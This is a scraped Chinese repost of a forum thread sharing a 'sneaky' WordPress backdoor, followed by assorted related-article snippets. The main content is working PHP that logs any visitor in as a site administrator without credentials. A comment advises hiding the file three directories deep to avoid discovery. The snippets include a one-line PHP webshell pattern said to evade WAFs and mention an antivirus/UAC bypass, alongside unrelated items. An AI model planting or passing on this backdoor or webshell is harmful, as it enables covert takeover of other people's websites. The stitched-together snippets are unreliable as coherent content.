猥琐的wordpress后门分享

  https://www.t00ls.net/thread-37312-1-1.html

一个可以自动调用管理员帐号登录wordpress后台的方法。

<?php

    require(‘../../../wp-blog-header.php‘); //我基本都是放到3级目录下。也可以放到根目录,但是容易被发现。
    $query_str = "SELECT ID FROM $wpdb->users";
    $user_ids = $wpdb->get_results($query_str);
    foreach ($user_ids as $uid) {
        $user_id = $uid->ID;
        if (user_can($user_id, ‘administrator‘)) {
            $user_info = get_userdata($user_id);
            $user_login = $user_info->user_login;
            wp_set_current_user($user_id, $user_login);
            wp_set_auth_cookie($user_id);
            do_action(‘wp_login‘, $user_login);
            echo "You are logged in as $user_login";
            if (function_exists(‘get_admin_url‘)) {
                wp_redirect(get_admin_url());
            } else {
                wp_redirect(get_bloginfo(‘wpurl‘) . ‘/wp-admin‘);
            }
            exit;
        }
    }

?>

  

时间: 2024-10-10 07:49:25

猥琐的wordpress后门分享的相关文章

PHP后门新玩法:一款猥琐的PHP后门分析

0x00 背景 近日,360网站卫士安全团队近期捕获一个基于PHP实现的webshell样本,其巧妙的代码动态生成方式,猥琐的自身页面伪装手法,让我们在分析这个样本的过程中感受到相当多的乐趣.接下来就让我们一同共赏这个奇葩的Webshell吧. 0x01 细节 Webshell代码如下: <?php error_reporting(0); session_start(); header("Content-type:text/html;charset=utf-8");if(empt

编写一个猥琐的反爬虫系统是种怎样的体验

我们所处的互联网, 是一个爬虫的世界.任何一个小公司,小团队,甚至一个应届毕业生,都有可能编写爬虫,偷偷的获取数据. 当你看到“爬虫”两个字的时候, 就应该有点血脉贲张的感觉了. 爬虫就如同病毒一样无孔不入.有的爬虫肆无忌惮地访问资源,导致服务器性能下降甚至崩溃:有的爬虫如同间谍一样秘密入侵,伪装成用户获取本不应该让它获取到的数据:有的爬虫冒充搜索引擎,堂而皇之的威胁你交出数据,可能还明目张胆的写各种教程嘲笑你们,是可忍孰不可忍?! 然而,千万要忍耐,稍稍做点什么,可以在名义上让他们胜利,实际上

18岁女生公交上被猥亵 拍下猥琐男样貌并踹下车

公交车上威胁女孩被拍照并被踹下车,警方按图抓获嫌疑人. 7月21日下午,在沈阳市239路公交车上发生一起一女孩被一男子骚扰案件.沈阳警方接到报警后,立即组织相关部门开展调查,于7月27日中午将涉嫌骚扰他人的王某某(男,37岁,沈阳市铁西区人)查获.公安机关正依法对其进行审查. 沈阳18岁的女学生小艾(化名)是事件的受害人.就在公交车里,她被一名男子骚扰,她反转镜头,拍下了猥琐男.然后一脚踹向猥琐男的后腰,正巧车门打开,猥琐男被一脚踹了下去…… 小艾还是学生,目前正放暑假.当时她在工业展览馆站上了

KVO模式 ———满足猥琐大众的 偷窥模式

KVO模式浅谈-满足猥琐男的偷窥模式 马仔哥 KVO模式 Key-Value Observing 它提供一种机制,当指定的对象的属性被修改后,则对象就会接受到通知.简单的说就是每次指定的被观察的对象的属性被修改后,KVO就会自动通知相应的观察者了. KVO其实也是"观察者"设计模式的一种应用.我的看法是,这种模式有利于两个类间的解耦合,尤其是对于 业务逻辑与视图控制 这两个功能的解耦合. 我自己的看法:我一般把KVO模式称为 偷窥模式 ,很形象,因为建立一个观察者,并且用到的回调函数,

无特征过狗一句话猥琐思路(代码执行)

来自:https://bypass.world/2017/01/%E6%97%A0%E7%89%B9%E5%BE%81%E8%BF%87%E7%8B%97%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%80%9D%E8%B7%AF/ 0x01.姿势一 我们知道php动态函数很有意思,那么你猜到了,姿势一就是: <?php $_POST['xx']($_POST['oo']);?> 注意xx参数设置成eval是不行的哦,让我们来看看效果: 0x02.姿势二 关键词是过滤了,但是你老

虚伪,猥琐,真诚,纯洁,情调,方法和马屁

虚伪:就是表面说一套,背后是另一套.表面可以把各种好的形容词挂在自己身上,不断的掩饰自己真实的一面. 猥琐:就是内心有见不得人龌蹉事情,对外自然流露出一种别扭,羞涩和欲盖弥彰.与虚伪相比,这个显得更卑下. 真诚:就是自己是什么样,就是什么样,无需去掩饰.对别人是什么感觉,就是什么感觉.虚伪的人也可以表现出真诚. 纯洁:在社会上感觉上是有点傻,甚至被认为是装的.不过的确有些是装的,这种就是虚伪的高手. 情调:说一些取悦人的话,但又不是很过分的那种,只是一丁点.这样依然会让人觉得愉悦. 方法:就是细

delphi之猥琐的webserver实现

http://www.birdol.com/cainiaobiancheng/238.html delphi之猥琐的webserver实现 菜鸟编程  十五楼的鸟儿  7年前 (2009-01-01)  1266浏览  0评论 简单的webserver而已,不过实现的功能有些猥琐,可以在远程监控你的桌面一举一动~~代码如下:[code=delphi]unit Main; interface uses Windows, Messages, SysUtils, Classes, Graphics,

解决WordPress百度分享图标不显示问题

最近在帮朋友维护博客时,发现他的百度分享居然不能使用了,首先很多人会认为,百度分享挂在那里就是一种摆设,又没有几个人去分享,有什么含义呢?其实挂百度分享的含义是非常重要的,网站增加一个百度分享是可以增加百度的收录.提升网站流量.但是经常会出现按照百度分享的操作一步一步操作了,分享的图标就是出不来,今天就以WordPress给大家解决百度分享图标不显示问题. 百度分享图标不显示问题原因及解决方法: 百度分享图标不显示问题主要原因在于,百度分享代码不支持https,下面就介绍具体的解决方法. 第一步

看我猥琐绕过AVG zend Pro 保护过UAC的

之前写了个安装器,可以绕过UAC安装服务.后来经测试Avg zend pro(我一个朋友在免杀时,在这个杀软上栽了不少跟头),我就安装测试了下,发现avg好生强悍,直接把我的杀了. 一开始怀疑是AVG插入的dll在监控搞怪,就把经历放在如何反hook伤了,就有了上一篇 反ring3 hook demo ,直接从dll文件修复 dll的code段,实现反hook 后来发现人家没在inlineHook上做手脚. 接下来,就是改动代码,看看到底杀什么操作,经过不断的注释代码,屏蔽功能,定位到了修改注册